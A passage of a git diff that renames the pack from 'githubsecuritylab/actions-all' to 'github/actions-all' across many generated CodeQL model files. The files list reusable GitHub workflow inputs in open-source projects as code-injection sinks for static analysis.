"input.dependency_track_url", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 31d0e691e7f6..e3c0040f7dfb 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index 5f9da314f90b..daaa34ab8ab1 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 7ae494adb2b8..9bfe61804816 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index dce969719d29..d8cd44f08ee9 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index cd5d5ff7d0fd..9b1fd73494e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index fd17e601d805..2fafb1f39b6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index bed40dce4298..0f4b87acc625 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 62a12e471389..4b58c4a27b1b 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 7491c4f951af..36e6df71d47a 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 1876f1146cbf..444291b0c50b 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 4a8534429f90..ebd11dd18113 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index ecac3f22f851..3dfd3db12f59 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index ffc4193edbf1..a47ce91bf1b0 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index 93b29308ff27..f4114b0a3960 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index c5965c5d8efc..a5b367ab3557 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 1fc5159e55a5..5aab353540a0 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index bce14a98edd5..db6b7c28c514 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 0439d6e1d4ce..bd2ceb9eeb16 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index 357e11b3c0ba..d52fc08b2fe0 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 4d3ea1e91562..8a664d1bc87b 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 44b905cab672..bbfe6cfc5015 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 192d975ea573..75bbf328d641 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 627fca5d3ff2..6cd55f46f646 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 4d4fd0f229ec..4c85243e4155 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 1ceacd2f1c0f..fd1c5ae41497 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index ba0f5c06a672..d848e7587ca3 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 3c8f11dd0cd8..e2e3fa8f5936 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index b7c00fff318d..69d627bdc7fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 5a129691bc5c..11687fa31b63 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index bd07156d06b5..3d3947515997 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index b029e3417102..2fb4ca827636 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 995e692e4945..92d91e541b90 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index db325a06baa5..ebf68ff3c126 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2c91ab62b0c8..22f0fedcc07e 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 8fdf39a0bbcf..23da361034c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 00fceb9c7bd2..19a5da19960b 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index a6b947dfbce7..abd0215aadad 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 9359ea482c03..5144d9ee2cb7 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 023666e67ffb..5a70ae48ec63 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 7005b7dd7c91..81130d31fa38 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8b73f89401a7..f49f239ac9bf 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index 3cf43b814db7..53be189b31ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index d33e308c7ebb..2d6132a396fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 5c1de93f08af..0cb5e01e3aa9 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index aab9fa502cb7..cd3ca5d7c011 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index b58fff831e11..c8f1b93ef2d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index f96264fbf423..7877af9bbbf6 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 6aaf6aa27834..3d9b87166823 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", 